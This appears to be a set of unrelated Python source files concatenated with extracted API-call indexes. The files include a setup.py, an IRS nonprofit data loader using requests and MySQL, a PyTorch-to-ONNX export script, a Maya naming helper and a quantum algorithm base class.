Exists(z, (x < z) & (z < y))), M))
def precond(n):
return ((2) < n) & Even(n)
def goldbach(n):
return precond(n) >> Exists([x,y], Prime(x) & Prime(y) & (x + y == n))
Goldbach = Forall(z, goldbach(z))
assert(val_non_strict(Goldbach, M))
def test_lazy_models():
clear_default_language()
def nats():
i = 0
while True:
yield i
i += 1
nat_dom = Domain('nat', nats)
Prime = Const('Prime', Int >> Bool)
M = Model()
M[Int] = nat_dom
M[Prime] = is_prime
x = Int('x')
assert(val_strict(Exists(x, Prime(x)), M))
| [
"boole.core.language.clear_default_language"
] | [((579, 603), 'boole.core.language.clear_default_language', 'clear_default_language', ([], {}), '()\n', (601, 603), False, 'from boole.core.language import clear_default_language\n'), ((4325, 4349), 'boole.core.language.clear_default_language', 'clear_default_language', ([], {}), '()\n', (4347, 4349), False, 'from boole.core.language import clear_default_language\n'), ((8335, 8359), 'boole.core.language.clear_default_language', 'clear_default_language', ([], {}), '()\n', (8357, 8359), False, 'from boole.core.language import clear_default_language\n')] |
#!/usr/bin/env python3
"""
Host the setup function.
"""
import pathlib
import setuptools
from cushead import info
def setup() -> None:
"""
Execute the setup.
"""
assets_path = pathlib.Path(info.PACKAGE_NAME) / "console" / "assets" / "images"
templates_path = pathlib.Path(info.PACKAGE_NAME) / "generator" / "templates" / "jinja" / "templates"
setuptools.setup(
name=info.PACKAGE_NAME,
version=info.PACKAGE_VERSION,
entry_points={"console_scripts": [f"{info.PACKAGE_NAME}={info.PACKAGE_NAME}.console.console:main"]},
url=info.SOURCE,
project_urls={
"Documentation": info.DOCUMENTATION,
"Source": info.SOURCE,
},
python_requires=f">={info.PYTHON_MIN_VERSION[0]}.{info.PYTHON_MIN_VERSION[1]}",
packages=setuptools.find_packages(exclude=(str(file) for file in pathlib.Path("").iterdir() if str(file) != info.PACKAGE_NAME)),
include_package_data=True,
data_files=[
("", ["requirements.txt", "LICENSE.md", "README.md"]),
(assets_path, [str(file) for file in pathlib.Path(assets_path).iterdir()]),
(templates_path, [str(file) for file in pathlib.Path(templates_path).iterdir()]),
],
zip_safe=False,
install_requires=pathlib.Path("requirements.txt").read_text().split(),
author=info.AUTHOR,
author_email=info.EMAIL,
description=info.DESCRIPTION,
long_description=pathlib.Path("README.md").read_text(),
long_description_content_type="text/markdown",
license=info.PACKAGE_LICENSE,
keywords=info.KEYWORDS,
platforms="any",
classifiers=[
"Development Status :: 5 - Production/Stable",
"Environment :: Console",
"Intended Audience :: Developers",
"License :: OSI Approved :: MIT License",
"Operating System :: OS Independent",
"Programming Language :: Python",
"Programming Language :: Python :: 3",
"Programming Language :: Python :: 3.8",
"Programming Language :: Python :: 3.9",
"Programming Language :: Python :: 3 :: Only",
"Topic :: Utilities",
"Topic :: Software Development",
"Topic :: Software Development :: Code Generators",
"Topic :: Software Development :: Libraries",
"Topic :: Software Development :: Libraries :: Python Modules",
"Topic :: Software Development :: User Interfaces",
],
)
if __name__ == "__main__":
setup()
| [
"pathlib.Path"
] | [((196, 227), 'pathlib.Path', 'pathlib.Path', (['info.PACKAGE_NAME'], {}), '(info.PACKAGE_NAME)\n', (208, 227), False, 'import pathlib\n'), ((283, 314), 'pathlib.Path', 'pathlib.Path', (['info.PACKAGE_NAME'], {}), '(info.PACKAGE_NAME)\n', (295, 314), False, 'import pathlib\n'), ((1480, 1505), 'pathlib.Path', 'pathlib.Path', (['"""README.md"""'], {}), "('README.md')\n", (1492, 1505), False, 'import pathlib\n'), ((1302, 1334), 'pathlib.Path', 'pathlib.Path', (['"""requirements.txt"""'], {}), "('requirements.txt')\n", (1314, 1334), False, 'import pathlib\n'), ((873, 889), 'pathlib.Path', 'pathlib.Path', (['""""""'], {}), "('')\n", (885, 889), False, 'import pathlib\n'), ((1109, 1134), 'pathlib.Path', 'pathlib.Path', (['assets_path'], {}), '(assets_path)\n', (1121, 1134), False, 'import pathlib\n'), ((1200, 1228), 'pathlib.Path', 'pathlib.Path', (['templates_path'], {}), '(templates_path)\n', (1212, 1228), False, 'import pathlib\n')] |
import os, sys
import re
import zipfile
import requests
import warnings
import logging
import pandas as pd
import numpy as np
from stat import S_IREAD, S_IRGRP, S_IROTH
import getpass
import pymysql
# Code by <NAME> (<EMAIL>), 2016-2017
class LoadData():
"""
This class is inherited by the Data class, and contains the methods related to retrieving data remotely.
From the web, that includes the raw 990 IRS data, the raw epostcard (990N) IRS data, and the raw BMR IRS
data. From NCCS MySQL, it has the methods for nteedocAllEins, lu_fipsmsa, and all of the prior NCCS
core file releases.
"""
def get_urls(self):
"""
Base method for loading the URLs necessary for downloads into memory.
Main core file URL: https://www.irs.gov/uac/soi-tax-stats-annual-extract-of-tax-exempt-organization-financial-data
ARGUMENTS
None
RETURNS
None
"""
main = self.main
path = main.path
entries = {'PF':{}, 'EZ':{}, 'Full':{}, 'BMF':{}, 'epostcard':{}}
entries = self.form_urls(entries, path)
entries = self.epost_urls(entries, path)
entries = self.bmf_urls(entries, path)
self.urls = entries
def form_urls(self, entries, path):
"""
Processes the text file in the "settings/urls" folder for EZ, Full and PF download paths.
ARGUMENTS
entries (dict) : A dictionary with keys=form and values=URLs or dict of URLs
path (str) : The base path on the local system
RETURNS
entries (dict) : Updated with the core file URLs as an entry.
"""
main = self.main
urlregex = re.compile(r'(\d{4})\s*=\s*(https?:\/\/.+\.(dat|zip|csv|txt))\s*')
skipline = re.compile(r'^#')
for form in main.forms:
with open(os.path.join(path, 'settings', 'urls', form.lower()+'.txt')) as f:
for line in f:
regex_match = urlregex.match(line)
skip_match = skipline.match(line)
if regex_match and not skip_match:
year = int(regex_match.group(1))
url = regex_match.group(2)
entries[form][year] = url
print('')
return entries
def epost_urls(self, entries, path):
"""
Processes the text file in the "settings/urls" folder for the epostcard (990N) download path.
ARGUMENTS
entries (dict) : A dictionary with keys=form and values=URLs or dict of URLs
path (str) : The base path on the local system
RETURNS
entries (dict) : Updated with the epostcard URLs as an entry.
"""
epostregex = re.compile(r'(epostcard)\s*=\s*(https?:\/\/.+\.(dat|zip|csv|txt))\s*')
skipline = re.compile(r'^#')
with open(os.path.join(path, 'settings', 'urls', 'epostcard.txt')) as f:
for line in f:
regex_match = epostregex.match(line)
skip_match = skipline.match(line)
if regex_match and not skip_match:
url = regex_match.group(2)
entries['epostcard'] = url
return entries
def bmf_urls(self, entries, path):
"""
Processes the text file in the "settings/urls" folder for BMF download path.
ARGUMENTS
entries (dict) : A dictionary with keys=form and values=URLs or dict of URLs
path (str) : The base path on the local system
RETURNS
entries (dict) : Updated with the BMF URLs as an entry.
"""
bmfregex = re.compile(r'(region\d)\s*=\s*(https?:\/\/.+\.(dat|zip|csv|txt))\s*')
skipline = re.compile(r'^#')
with open(os.path.join(path, 'settings', 'urls', 'bmf.txt')) as f:
for line in f:
regex_match = bmfregex.match(line)
skip_match = skipline.match(line)
if regex_match and not skip_match:
url = regex_match.group(2)
region = regex_match.group(1)
entries['BMF'][region] = url
return entries
def download(self):
"""
Base method for downloading the main core files from the IRS, setting the EIN as the index, and
updating the SOURCE column with the appropriate file name.
ARGUMENTS
None
RETURNS
None
"""
main = self.main
delim = self.irs_delim
current_yr = self.core_file_year #int
main.logger.info('Beginning any necessary downloads from the IRS.')
for form in main.forms:
try:
url = self.urls[form][current_yr]
except KeyError:
raise Exception('URL not found for core file year {}, form {}. Please check the "urls" folder.'.format(current_year, form))
df = pd.read_csv(self.download_file(url), sep=delim, dtype='str')
#Most IRS files have EIN in caps, but at least one (2012 EZ) has it in lowercase
if 'ein' in df.columns:
df.rename(columns={'ein':'EIN'}, inplace=True)
df.set_index('EIN', inplace=True)
#adds the source file name as a column
df['SOURCE'] = url.split('/')[-1]
self.data_dict[form] = df
main.logger.info('Downloading complete.\n')
def sql_auth(self):
"""
Handles logging into the NCCS MySQL server, including prompting for credentials.
ARGUMENTS
None
RETURNS
None
"""
if self.get_from_sql:
self.main.logger.info('Authenticating connection to MySQL server...')
un = input(' MySQL user name: ')
if sys.stdin.isatty():
#program is being run in an interactive interpreter, and the password echo can't be shut off
pw = input(' MySQL password: ')
else:
#system is running from the command line, and password echo can be off
pw = getpass.getpass(prompt=' MySQL password: ')
try:
self.sql_connection = pymysql.connect(host=self.sql_server_name, db='nccs', user=un, password=pw)
except pymysql.OperationalError:
self.main.logger.info(' failed to connect to server; will try to load from downloads/nccs folder.\n')
self.sql_connection = None
else:
self.main.logger.info(' login successful, will attempt to retrieve all necessary data from the SQL database.\n')
else:
self.main.logger.info('Without logging into NCCS MySQL server, will look for all files in downloads/nccs folder.\n')
self.sql_connection = None
def close_sql(self):
"""
Cleanly shuts down the NCCS MySQL connection.
ARGUMENTS
None
RETURNS
None
"""
if self.get_from_sql:
self.main.logger.info('Cosing MySQL connection.')
self.sql_connection.close()
def get_sql(self, fname, dbase, cols='*', index_col='EIN', match_dtypes=None, force_sql_cols=False):
"""
Method for downloading a file, passed as the "fname" argument, from the MySQL connection established
in the sql_auth method.
It will first check its own cache to see if it has already downloaded the file and is holding it in
memory, then it will look in the "downloads/nccs" folder to see if that exact fname has already been
downloaded. Only if both of those are false will it connect to MySQL to retrieve the file.
For users off the Urban campus or without a login to the NCCS MySQL server, having all the necessary
files as .csv documents in the "downloads/nccs" folder means the program can still build. See
"folder instructions.txt" in that folder for more details.
ARGUMENTS
cols (str or list): Default '*', used when only a subset of the data should be returned.
index_col (str): Default 'EIN', specifies the column to use as the index.
match_dtypes (DataFrame): Default None, if a dataframe is passed it will extract the schema from
it and apply it to the data specified in fname; otherwise it uses the
MySQL defaults.
force_sql_cols (bool): Default False, If True it will force the columns specified in the cols argument
to become a part of the SQL statement; otherwise it downloads * in the SELECT
statement and then subsets it later. This is used, for example, in
nteedocAllEINS because the full file is 1.5 gigabytes but only 1/3rd of that is
needed.
RETURNS
DataFrame
"""
file_path = os.path.join(self.main.path, self.nccs_download_folder)
existing_downloads = os.listdir(file_path)
existing_downloads = [f for f in existing_downloads if f.endswith('.csv')]
if fname in self.sql_cache:
self.main.logger.info('File already cached; trying version in memory.')
if isinstance(cols, list):
try:
return self.sql_cache[fname][cols]
except KeyError:
self.main.logger.info(' Specified columns not in memory.')
pass #if the dataframe is cached already but the desired cols are missing, continue with sql loading
else:
return self.sql_cache[fname]
if fname+'.csv' in existing_downloads:
self.main.logger.info('File found in NCCS downloads; using already-downloaded version.')
if match_dtypes is not None:
dtype = match_dtypes.dtypes.to_dict()
dtype['EIN'] = 'str'
else:
dtype = 'str'
df = pd.read_csv(os.path.join(file_path, fname+'.csv'), dtype=dtype, low_memory=False, encoding='utf-8')
if index_col is not None: df.set_index(index_col, inplace=True)
if match_dtypes is None:
num_cols = [c for c in self.numeric_columns if c in df]
for col in num_cols:
df[col] = pd.to_numeric(df[col], errors='coerce').fillna(0) #recast the str columns to float64 or int64
str_cols = df.select_dtypes(include=[np.object_]).columns.values #fill string NA columns with empty strings
df.loc[:, str_cols] = df.loc[:, str_cols].fillna('')
elif self.sql_connection is not None:
con = self.sql_connection
con.select_db(dbase)
if force_sql_cols:
sql_cols = ', '.join(cols)
else:
sql_cols = '*'
df = pd.read_sql('SELECT {} FROM {}'.format(sql_cols, fname), con=con, index_col=index_col)
df.columns = [c.upper() for c in df.columns.values]
if match_dtypes is not None:
self.main.logger.info(' standardizing dtypes for {}...'.format(fname))
def _dtype_matcher(c):
if c.name in match_dtypes.columns:
desired_type = match_dtypes[c.name].dtype.type
if desired_type is np.object_:
return c.astype(str)
elif desired_type in [np.float64, np.int64, np.float32, np.int32]:
return pd.to_numeric(c, errors='coerce').fillna(0)
else:
return c.astype(str) #assume strings for anything else (e.g. dates)
#raise Exception('Unknown dtype: {}, {}'.format(c.name, desired_type))
else:
return c.astype(str)
df = df.apply(_dtype_matcher) #this is not very efficient, but I haven't found a better way to make sure all dtypes match from SQL
df.to_csv(os.path.join(file_path, fname+'.csv'), index=df.index.name is not None)
else:
raise Exception('No active connection to NCCS MySQL database, and file not found in downloads/nccs folder: {}'.format(fname))
self.sql_cache[fname] = df #save all dataframes loaded from sql in case they are needed later, because sql load times are slow
if cols == '*':
return df
else:
return df.loc[:, [c.upper() for c in cols if c.upper() != 'EIN']]
def download_epostcard(self, usecols=[0, 1], names=['EIN', 'EPOSTCARD'], date_col='EPOSTCARD'):
"""
Method for downloading the epostcard (990N) data from the IRS.
ARGUMENTS
usecols (list) : Default [0, 1], this data comes without headers, so the subset needed is given as
indexes.
names (list) : Default ['EIN', 'EPOSTCARD'], provides the header names. Must be the same dimension
as usecols.
date_col (str) : Default 'EPOSTCARD', specifies the column to be converted to date dtype.
RETURNS
DataFrame
"""
url = self.urls['epostcard']
delim = self.epostcard_delim
#a df of 'EIN', 'YEAR' from the epostcard records
df = pd.read_csv(self.download_file(url, force=True),
skip_blank_lines=True,
sep=delim,
usecols=usecols,
names=names,
dtype='str')
df.set_index('EIN', inplace=True)
df = df[df[date_col] != ''] #drop null dates
assert(df.index.is_unique), 'Expected unique EINs in epostcard data.'
return df
def download_bmf(self):
"""
Accesses the stored URLs for the raw BMF files from the IRS, then passes the necessary information
into the download_file method.
ARGUMENTS
None
RETURNS
DataFrame
"""
bmf_data = {}
delim = self.bmf_delim
for region in self.urls['BMF'].keys():
url = self.urls['BMF'][region]
bmf_data[region] = pd.read_csv(self.download_file(url), sep=delim, dtype='str')
df = pd.concat(bmf_data).set_index('EIN')
assert(df.index.is_unique), 'Expected unique EINs in BMF data.'
return df
def download_file(self, url, force=False):
"""
Method for downloading the specified URL, then unzipping it if necessary. All newly-downloaded
files are set to read-only.
ARGUMENTS
url (str) : Any valid URL
force (bool) : Default False, when True it will ignore existing files in the "downloads/IRS" folder,
when False it will only download a new version if the file does not already exist.
RETURNS
str : Location on local file system of the downloaded (or pre-existing) file.
"""
main = self.main
output_path = os.path.join(main.path, self.irs_download_folder)
fname = url.split('/')[-1] #extracts the file name from the end of the url
output_file = os.path.join(output_path, fname) #full location of file to write to
if main.force_new_download or force or not os.path.exists(output_file):
r = requests.get(url, headers=self.headers)
#this catches invalid URLs entered into the url text files: the IRS website returns a
#page saying "404 error code" but since that page is a valid page, it returns an actual
#success code of 200. Simply searching for 'Page Not Found' in the body is very slow
#when it is an actual download link with a large file, so it first checks the headers
#to make sure it's not ['Content-Type'] = 'application/zip'
if 'text/html' in r.headers['Content-Type'] and 'Page Not Found' in r.text:
raise Exception('Warning: the url {} appears to be invalid.')
with open(output_file, 'wb') as ofile:
ofile.write(r.content)
os.chmod(output_file, S_IREAD|S_IRGRP|S_IROTH) #sets the download to read-only
main.logger.info('File {} downloaded.'.format(fname))
if fname.endswith('.zip'):
zip_ref = zipfile.ZipFile(output_file, 'r')
zip_ref.extractall(output_path+os.sep) #unzips into the download path
#looks at the list of unizpped items, warns if there is more than 1
unzipped_files = zip_ref.namelist()
zip_ref.close() #finished with the zip object
if len(unzipped_files) != 1:
main.logger.info('WARNING: More or less than one file in {}; system may not be using the right one as data.'.format(fname))
#sets the unzipped files to read-only
for nfile in unzipped_files:
output_file = os.path.join(output_path, nfile)
os.chmod(output_file, S_IREAD|S_IRGRP|S_IROTH)
main.logger.info('File {} extracted from zip.'.format(nfile))
#returns the contents of a zip file as the output file
return output_file
else:
#returns the output file if it's not zipped
return output_file
else:
main.logger.info('Using existing contents of {} in downloads.'.format(fname))
return output_file
| [
"os.path.exists",
"os.listdir",
"zipfile.ZipFile",
"re.compile",
"os.path.join",
"pymysql.connect",
"requests.get",
"getpass.getpass",
"os.chmod",
"pandas.to_numeric",
"sys.stdin.isatty",
"pandas.concat"
] | [((1685, 1757), 're.compile', 're.compile', (['"""(\\\\d{4})\\\\s*=\\\\s*(https?:\\\\/\\\\/.+\\\\.(dat|zip|csv|txt))\\\\s*"""'], {}), "('(\\\\d{4})\\\\s*=\\\\s*(https?:\\\\/\\\\/.+\\\\.(dat|zip|csv|txt))\\\\s*')\n", (1695, 1757), False, 'import re\n'), ((1771, 1787), 're.compile', 're.compile', (['"""^#"""'], {}), "('^#')\n", (1781, 1787), False, 'import re\n'), ((2743, 2818), 're.compile', 're.compile', (['"""(epostcard)\\\\s*=\\\\s*(https?:\\\\/\\\\/.+\\\\.(dat|zip|csv|txt))\\\\s*"""'], {}), "('(epostcard)\\\\s*=\\\\s*(https?:\\\\/\\\\/.+\\\\.(dat|zip|csv|txt))\\\\s*')\n", (2753, 2818), False, 'import re\n'), ((2833, 2849), 're.compile', 're.compile', (['"""^#"""'], {}), "('^#')\n", (2843, 2849), False, 'import re\n'), ((3641, 3716), 're.compile', 're.compile', (['"""(region\\\\d)\\\\s*=\\\\s*(https?:\\\\/\\\\/.+\\\\.(dat|zip|csv|txt))\\\\s*"""'], {}), "('(region\\\\d)\\\\s*=\\\\s*(https?:\\\\/\\\\/.+\\\\.(dat|zip|csv|txt))\\\\s*')\n", (3651, 3716), False, 'import re\n'), ((3730, 3746), 're.compile', 're.compile', (['"""^#"""'], {}), "('^#')\n", (3740, 3746), False, 'import re\n'), ((8960, 9015), 'os.path.join', 'os.path.join', (['self.main.path', 'self.nccs_download_folder'], {}), '(self.main.path, self.nccs_download_folder)\n', (8972, 9015), False, 'import os, sys\n'), ((9045, 9066), 'os.listdir', 'os.listdir', (['file_path'], {}), '(file_path)\n', (9055, 9066), False, 'import os, sys\n'), ((15116, 15165), 'os.path.join', 'os.path.join', (['main.path', 'self.irs_download_folder'], {}), '(main.path, self.irs_download_folder)\n', (15128, 15165), False, 'import os, sys\n'), ((15271, 15303), 'os.path.join', 'os.path.join', (['output_path', 'fname'], {}), '(output_path, fname)\n', (15283, 15303), False, 'import os, sys\n'), ((5787, 5805), 'sys.stdin.isatty', 'sys.stdin.isatty', ([], {}), '()\n', (5803, 5805), False, 'import os, sys\n'), ((15436, 15475), 'requests.get', 'requests.get', (['url'], {'headers': 'self.headers'}), '(url, headers=self.headers)\n', (15448, 15475), False, 'import requests\n'), ((2869, 2924), 'os.path.join', 'os.path.join', (['path', '"""settings"""', '"""urls"""', '"""epostcard.txt"""'], {}), "(path, 'settings', 'urls', 'epostcard.txt')\n", (2881, 2924), False, 'import os, sys\n'), ((3766, 3815), 'os.path.join', 'os.path.join', (['path', '"""settings"""', '"""urls"""', '"""bmf.txt"""'], {}), "(path, 'settings', 'urls', 'bmf.txt')\n", (3778, 3815), False, 'import os, sys\n'), ((6093, 6139), 'getpass.getpass', 'getpass.getpass', ([], {'prompt': '""" MySQL password: """'}), "(prompt=' MySQL password: ')\n", (6108, 6139), False, 'import getpass\n'), ((6196, 6271), 'pymysql.connect', 'pymysql.connect', ([], {'host': 'self.sql_server_name', 'db': '"""nccs"""', 'user': 'un', 'password': 'pw'}), "(host=self.sql_server_name, db='nccs', user=un, password=pw)\n", (6211, 6271), False, 'import pymysql\n'), ((10045, 10084), 'os.path.join', 'os.path.join', (['file_path', "(fname + '.csv')"], {}), "(file_path, fname + '.csv')\n", (10057, 10084), False, 'import os, sys\n'), ((14358, 14377), 'pandas.concat', 'pd.concat', (['bmf_data'], {}), '(bmf_data)\n', (14367, 14377), True, 'import pandas as pd\n'), ((15391, 15418), 'os.path.exists', 'os.path.exists', (['output_file'], {}), '(output_file)\n', (15405, 15418), False, 'import os, sys\n'), ((16216, 16266), 'os.chmod', 'os.chmod', (['output_file', '(S_IREAD | S_IRGRP | S_IROTH)'], {}), '(output_file, S_IREAD | S_IRGRP | S_IROTH)\n', (16224, 16266), False, 'import os, sys\n'), ((16427, 16460), 'zipfile.ZipFile', 'zipfile.ZipFile', (['output_file', '"""r"""'], {}), "(output_file, 'r')\n", (16442, 16460), False, 'import zipfile\n'), ((12121, 12160), 'os.path.join', 'os.path.join', (['file_path', "(fname + '.csv')"], {}), "(file_path, fname + '.csv')\n", (12133, 12160), False, 'import os, sys\n'), ((17069, 17101), 'os.path.join', 'os.path.join', (['output_path', 'nfile'], {}), '(output_path, nfile)\n', (17081, 17101), False, 'import os, sys\n'), ((17122, 17172), 'os.chmod', 'os.chmod', (['output_file', '(S_IREAD | S_IRGRP | S_IROTH)'], {}), '(output_file, S_IREAD | S_IRGRP | S_IROTH)\n', (17130, 17172), False, 'import os, sys\n'), ((10386, 10425), 'pandas.to_numeric', 'pd.to_numeric', (['df[col]'], {'errors': '"""coerce"""'}), "(df[col], errors='coerce')\n", (10399, 10425), True, 'import pandas as pd\n'), ((11610, 11643), 'pandas.to_numeric', 'pd.to_numeric', (['c'], {'errors': '"""coerce"""'}), "(c, errors='coerce')\n", (11623, 11643), True, 'import pandas as pd\n')] |
# Copyright (c) 2021 <NAME>(<EMAIL>)
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import argparse
import torch
import yaml
import onnxruntime as ort
def get_args():
parser = argparse.ArgumentParser(description='export to onnx model')
parser.add_argument('--config', required=True, help='config file')
parser.add_argument('--jit_model',
required=True,
help='pytorch jit script model')
parser.add_argument('--onnx_model',
required=True,
help='output onnx model')
args = parser.parse_args()
return args
def main():
args = get_args()
with open(args.config, 'r') as fin:
configs = yaml.load(fin, Loader=yaml.FullLoader)
feature_dim = configs['model']['input_dim']
model = torch.jit.load(args.jit_model)
print(model)
# dummy_input: (batch, time, feature_dim)
dummy_input = torch.randn(1, 100, feature_dim, dtype=torch.float)
torch.onnx.export(model,
dummy_input,
args.onnx_model,
input_names=['input'],
output_names=['output'],
dynamic_axes={'input': {
1: 'T'
}})
torch_output = model(dummy_input)
ort_sess = ort.InferenceSession(args.onnx_model)
onnx_input = dummy_input.numpy()
onnx_output = ort_sess.run(None, {'input': onnx_input})
if torch.allclose(torch_output, torch.tensor(onnx_output[0])):
print('Export to onnx succeed!')
else:
print('''Export to onnx succeed, but pytorch/onnx have different
outputs when given the same input, please check!!!''')
if __name__ == '__main__':
main()
| [
"argparse.ArgumentParser",
"torch.jit.load",
"onnxruntime.InferenceSession",
"yaml.load",
"torch.tensor",
"torch.randn",
"torch.onnx.export"
] | [((683, 742), 'argparse.ArgumentParser', 'argparse.ArgumentParser', ([], {'description': '"""export to onnx model"""'}), "(description='export to onnx model')\n", (706, 742), False, 'import argparse\n'), ((1318, 1348), 'torch.jit.load', 'torch.jit.load', (['args.jit_model'], {}), '(args.jit_model)\n', (1332, 1348), False, 'import torch\n'), ((1430, 1481), 'torch.randn', 'torch.randn', (['(1)', '(100)', 'feature_dim'], {'dtype': 'torch.float'}), '(1, 100, feature_dim, dtype=torch.float)\n', (1441, 1481), False, 'import torch\n'), ((1486, 1629), 'torch.onnx.export', 'torch.onnx.export', (['model', 'dummy_input', 'args.onnx_model'], {'input_names': "['input']", 'output_names': "['output']", 'dynamic_axes': "{'input': {(1): 'T'}}"}), "(model, dummy_input, args.onnx_model, input_names=['input'\n ], output_names=['output'], dynamic_axes={'input': {(1): 'T'}})\n", (1503, 1629), False, 'import torch\n'), ((1837, 1874), 'onnxruntime.InferenceSession', 'ort.InferenceSession', (['args.onnx_model'], {}), '(args.onnx_model)\n', (1857, 1874), True, 'import onnxruntime as ort\n'), ((1219, 1257), 'yaml.load', 'yaml.load', (['fin'], {'Loader': 'yaml.FullLoader'}), '(fin, Loader=yaml.FullLoader)\n', (1228, 1257), False, 'import yaml\n'), ((2008, 2036), 'torch.tensor', 'torch.tensor', (['onnx_output[0]'], {}), '(onnx_output[0])\n', (2020, 2036), False, 'import torch\n')] |
from maya import cmds
import copy
# TODO: Find a way to have different naming for different production.
# Maybe handle it in the rig directly?
class BaseName(object):
"""
This class handle the naming of object.
Store a name as a list of 'tokens'
When resolved, the tokens are joinned using a 'separator' (normally an underscore)
Also some specific properties exists:
- Side: Generally L/R token
- Prefix: Always the first token
- Suffix: Always the last token
You can resolve a BaseName instance from a string.
>>> name = BaseName('l_eye_jnt')
>>> name.resolve()
'l_eye_jnt'
You can build a BaseName instance manually.
>>> name = BaseName(tokens=('eye',), suffix='jnt', side=BaseName.SIDE_L)
>>> name.resolve()
'l_eye_jnt'
You can add tokens at any time.
>>> name.add_tokens('upp')
>>> name.resolve()
'l_eye_upp_jnt'
You can override a BaseName public properties.
>>> name = BaseName()
>>> name.tokens = ('eye',)
>>> name.resolve()
'eye'
>>> name.suffix = 'jnt'
>>> name.resolve()
'eye_jnt'
>>> name.side = name.SIDE_L
>>> name.resolve()
'l_eye_jnt'
"""
separator = '_'
type_anm = 'anm'
type_anm_grp = 'anm_grp'
type_jnt = 'jnt'
type_rig = 'rig'
type_rig_grp = 'data_grp'
root_anm_name = 'anms'
root_geo_name = 'geos'
root_jnt_name = 'jnts'
root_rig_name = 'data'
root_backup_name = 'backup'
layer_anm_name = 'layer_anm'
layer_rig_name = 'layer_rig'
layer_geo_name = 'layer_geo'
SIDE_L = 'l'
SIDE_R = 'r'
def __init__(self, name=None, tokens=None, prefix=None, suffix=None, side=None):
self.tokens = []
self.prefix = None
self.suffix = None
self.side = None
if name:
tokens = self.build_from_string(name)
# Apply manual overrides
if tokens:
self.tokens = tokens
if prefix:
self.prefix = prefix
if suffix:
self.suffix = suffix
if side:
self.side = side
def copy(self):
"""
Return a copy of the name object.
"""
inst = self.__class__()
inst.tokens = copy.copy(self.tokens)
inst.prefix = self.prefix
inst.suffix = self.suffix
return inst
def rebuild(self, name):
return self.__class__(name, prefix=self.prefix, suffix=self.suffix)
def get_basename(self):
"""
Each name have one single token that represent it's part.
ex: L_LegUpp_Ik_Ctrl -> LegUpp
By default it is the first non-side token in the name.
return: The part name.
"""
for token in self.tokens:
if not self.get_side_from_token(token):
return token
def remove_extra_tokens(self):
"""
Remove any tokens that is not the base token or a side token.
:return:
"""
basename = self.get_basename()
found_base_token = False
new_tokens = []
for token in self.tokens:
if self.get_side_from_token(token):
new_tokens.append(token)
elif not found_base_token and token == basename:
new_tokens.append(token)
self.tokens = new_tokens
def build_from_string(self, name):
raw_tokens = self._get_tokens(name)
self.tokens = []
#self.prefix = None
#self.suffix = None
self.side = None
self.add_tokens(*raw_tokens)
def _get_tokens(self, val):
return val.split(self.separator)
def _join_tokens(self, tokens):
return self.separator.join(tokens)
def add_tokens(self, *args):
for arg in args:
for token in arg.split(self.separator):
side = self.get_side_from_token(token)
if side:
self.side = side
else:
self.tokens.append(token)
def add_suffix(self, suffix):
self.tokens.append(suffix)
def add_prefix(self, prefix):
self.tokens.insert(0, prefix)
def get_unique_name(self, name):
if cmds.objExists(name):
i = 1
while cmds.objExists(name + str(i)):
i += 1
return name + str(i)
return name
@classmethod
def get_side_from_token(cls, token):
token_lower = token.lower()
if token_lower == cls.SIDE_L.lower():
return cls.SIDE_L
if token_lower == cls.SIDE_R.lower():
return cls.SIDE_R
def get_tokens(self):
"""
:return: All token without the side tokens.
"""
return [token for token in self.tokens if not self.get_side_from_token(token)]
def resolve(self, *args):
tokens = []
if self.prefix:
tokens.append(self.prefix)
if self.side:
tokens.append(self.side)
tokens.extend(self.tokens)
tokens.extend(args)
if self.suffix:
tokens.append(self.suffix)
name = self._join_tokens(tokens)
# If we have name conflicts, we WILL want to crash.
'''
# Prevent maya from crashing by guarantying that the name is unique.
if cmds.objExists(name):
name_old = name
name = self.get_unique_name(name)
cmds.warning("Name {0} already exist, using {1} instead.".format(
name_old, name
))
'''
return name
def rename(self, obj, *args):
name = self.resolve(*args)
obj.rename(name)
def __repr__(self):
return self.resolve()
| [
"copy.copy",
"maya.cmds.objExists"
] | [((2244, 2266), 'copy.copy', 'copy.copy', (['self.tokens'], {}), '(self.tokens)\n', (2253, 2266), False, 'import copy\n'), ((4201, 4221), 'maya.cmds.objExists', 'cmds.objExists', (['name'], {}), '(name)\n', (4215, 4221), False, 'from maya import cmds\n')] |
# Copyright 2022 Tiernan8r
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
Constructs the quantum register, circuits of composite gates, and runs the
simulation of Grover's Algorithm
"""
import abc
from typing import Tuple
from qcp.matrices import SPARSE, DefaultMatrix, Matrix
class GeneralAlgorithm(abc.ABC):
def __init__(self, size: int):
assert size > 1, "need minimum of two qbits"
self.size = size
self.state = self.initial_state()
self.circuit = self.construct_circuit()
def initial_state(self) -> Matrix:
"""
Creates a state vector corresponding to |1..0>
returns:
Matrix: the state vector
"""
entries: SPARSE = {i: {} for i in range(2 ** self.size)}
entries[0][0] = 1
return DefaultMatrix(entries)
def construct_circuit(self) -> Matrix:
"""
Construct the circuit for the algorithm
returns:
Matrix: Matrix representing our the circuit for the algorithm
"""
pass
def run(self) -> Matrix:
"""
Run the algorithm by applying the quantum circuit to the initial
state
returns:
Matrix: Column matrix representation of the final state
"""
if self.circuit is not None:
self.state = self.circuit * self.state
return self.state
def measure(self) -> Tuple[int, float]:
"""
'measures' self.state by selecting a state weighted by its
(amplitude ** 2)
returns:
Tuple[int, float]: The state observed and the probability of
measuring said state
"""
pass
| [
"qcp.matrices.DefaultMatrix"
] | [((1301, 1323), 'qcp.matrices.DefaultMatrix', 'DefaultMatrix', (['entries'], {}), '(entries)\n', (1314, 1323), False, 'from qcp.matrices import SPARSE, DefaultMatrix, Matrix\n')] |
import math
import numpy as np
import torch
from mock import patch
from core.train_utils import compute_angular_error, compute_angular_error_xyz_arr, spherical2cartesial
def test_spherical2cartesial():
spherical = torch.Tensor([
[0, 0],
[math.pi / 2, 0],
